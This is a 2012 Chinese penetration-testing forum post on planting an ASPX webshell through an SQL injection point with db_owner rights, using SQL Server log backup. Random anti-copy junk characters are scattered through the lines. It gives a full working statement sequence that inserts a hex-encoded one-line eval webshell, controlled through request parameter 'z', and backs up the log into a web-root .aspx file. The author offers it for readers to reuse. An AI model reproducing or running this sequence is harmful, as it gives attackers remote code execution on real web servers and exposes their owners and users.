中国网络渗透测试联盟

标题: 关于aspx环境下log备份的一些思考 [打印本页]

作者: admin    时间: 2012-9-5 14:57
标题: 关于aspx环境下log备份的一些思考
最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
$ T) S/ Y3 R% {6 [& i1 x: T7 V5 q但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
& W. D1 ^/ @. ]经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
3 O2 r9 y( [+ b1 A6 Q$ U* ~经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。' m7 U% F+ |% A" m/ \7 k
; {6 p) J2 y, S3 s+ C2 k% w
--------------------------------------------------------------
: S) z" `/ _. E+ L- J8 e& Z今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,7 c  `" B5 ?$ D" m! D9 D  B5 h% Q
自己修改备份语句如下:
6 P0 s1 g2 D$ P- A& r0 YDrop table cmd;--
9 |! p# f; W" Y2 Ialter database db_test set RECOVERY FULL;--: T$ y' P5 F  o  d  E; R8 ]
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
3 a1 |) z. F) N  y7 c, Ibackup log db_test to disk = 'c:\bak' with init;--
* a0 e- J$ y# o' ]( Dinsert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--/ k1 U* z9 E6 y* q$ b$ T
delete from cmd where id>1;--删除id>1的数据
! x, T8 _4 [) r* o3 {- F9 ^  e7 |+ Rbackup log db_test to disk = 'e:\webroot\test.aspx';--
. S# z2 Z! {: i/ E2 ]Drop table cmd;--, `/ f9 |* o2 p1 W( z
希望对大家有用。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2